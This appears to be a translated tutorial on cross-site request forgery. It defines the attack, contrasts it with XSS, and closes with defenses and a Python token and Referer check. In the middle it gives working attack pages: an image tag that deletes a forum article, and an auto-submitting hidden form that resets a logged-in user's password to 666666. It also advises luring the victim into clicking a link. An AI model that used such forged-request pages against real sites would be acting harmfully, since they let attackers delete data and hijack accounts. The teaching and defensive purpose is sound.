4_CSRF
CSRF
When you log in to a website, the browser and the site normally establish a session. While that session is still alive you can post articles, send mail, delete articles and so on; once the session has ended, any further operation tells you the session has expired and asks you to log in again.
CSRF (client-side cross-site request forgery) means: the attacker uses some technical means to trick the user's browser into visiting a site the user has already authenticated to and performing operations there. Put another way, CSRF is a hacker using the victim's cookie to win the server's trust and carry out operations on the victim's behalf.
Neither CSRF nor SSRF can steal cookies.
Difference from XSS
XSS exploits the user's trust in a particular website.
CSRF exploits the website's trust in the user's browser.
Exploitation
Conditions for exploitation:
1. The attacker can learn all parameters of the URL and understand their meaning.
2. The user can be induced to visit the crafted payload.
3. Simple authentication only guarantees that the request comes from some user's browser; it cannot guarantee that the request itself was sent voluntarily by the user.
Where it can be exploited:
1. The operation is meaningful (for example, changing a password).
2. Validation is too simple (the parameters are fixed, or we can set the parameters ourselves).
GET-type CSRF attack
Suppose there is a forum www.aa.com where deleting an article is done with a request to a link like
http://www.aa.com/opt.php?id=135&act=del&name=Tom
User A has logged in to the forum and owns an article with id=251, so his browser has already gained the forum's trust.
Now a hacker, user B, builds an HTML page b.html that triggers the request through a src attribute; the content of b.html is as follows:
<html>
<head>
<title>test</title>
</head>
<body>
<img src="http://www.aa.com/opt.php?id=251&act=del&name=A" />
</body>
</html>
B places b.html on a website he set up himself, at http://www.bb.com/b.html.
POST-type CSRF attack
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>aa</title>
</head>
<body>
<form action="http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/286" method="post">
昵称:<input type="text" name="password" id="password" class="form-control" value="xxxxx">
用户名:<input type="text" name="password" id="password" class="form-control" value="xiaoming">
密码:<input type="password" name="password" id="password" class="form-control" value="">
确认密码:<input type="password" name="cpassword" id="conpassword" class="form-control" value="">
<input type="submit" name="button" value="提交">
</form>
</body>
</html>
At this point we can construct an auto-submitting form page xxxx.html with the following content:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>test</title>
</head>
<body>
<form action="http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/286" method="post" id="test">
<input type="hidden" name="password" id="password" value="666666">
<input type="hidden" name="cpassword" id="conpassword" value="666666">
</form>
<script type="text/javascript">
window.onload = function () {
    // submit the hidden form automatically as soon as the page has loaded
    document.getElementById('test').submit();
    // document.forms[0].submit();
}
</script>
</body>
</html>
Then send the link http://www.bb.com/wwww.html to the user and lure him into clicking it; as soon as he clicks, the password is changed.
Defenses
1. Secondary confirmation (a pop-up asking the user to confirm important operations such as deleting a user or transferring money).
2. Token authentication
GET requests: the token can be stored in a cookie.
POST requests: add a hidden input element to the form whose value is the token.
3. Validate the Referer header.
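As an added illustration of defenses 2 and 3 (example code written for this page, not code from the original post or from any site named in it), the following Python check issues a random token bound to the server-side session and, for every state-changing action regardless of HTTP method, requires that the token presented in the request parameters matches the session's token and that the Origin or Referer header names the site itself. The in-memory session store, the allowed origin https://www.aa.com and all function names are assumptions made for the demonstration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed site origin for the forum in the text (a placeholder, not a real deployment).
ALLOWED_ORIGIN = "https://www.aa.com"

# Constructed in-memory session store (session_id -> per-session data);
# a real server would use its session backend instead.
_sessions = {}


def issue_csrf_token(session_id):
    """Create a random token once per session and return it. The site
    embeds it as a hidden input in every form it renders, so a page on
    another origin cannot know the value."""
    sess = _sessions.setdefault(session_id, {})
    if "csrf_token" not in sess:
        sess["csrf_token"] = secrets.token_urlsafe(32)
    return sess["csrf_token"]


def _origin_ok(headers):
    """Defense 3: compare the Origin header (or, failing that, the scheme
    and host of Referer) with the site's own origin; a request carrying
    neither header is rejected."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == ALLOWED_ORIGIN


def is_request_allowed(headers, session_id, params):
    """Defenses 2 and 3 for a state-changing action (delete, password change).
    Applied whatever the HTTP method, so a forged GET link such as
    opt.php?id=251&act=del is refused just like a forged POST. The session
    cookie alone is never enough: the token must arrive in `params` (query
    string or form body), which the browser does not attach by itself."""
    if not _origin_ok(headers):
        return False
    expected = _sessions.get(session_id, {}).get("csrf_token")
    presented = params.get("csrf_token", "")
    if expected is None or not presented:
        return False
    # Constant-time comparison, so timing does not leak the token.
    return hmac.compare_digest(expected.encode(), presented.encode())
```

A request from the attacker's page fails twice over: its Referer is www.bb.com, and it cannot supply the token that only the site's own forms contain.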
References
https://security.tencent.com/index.php/blog/msg/24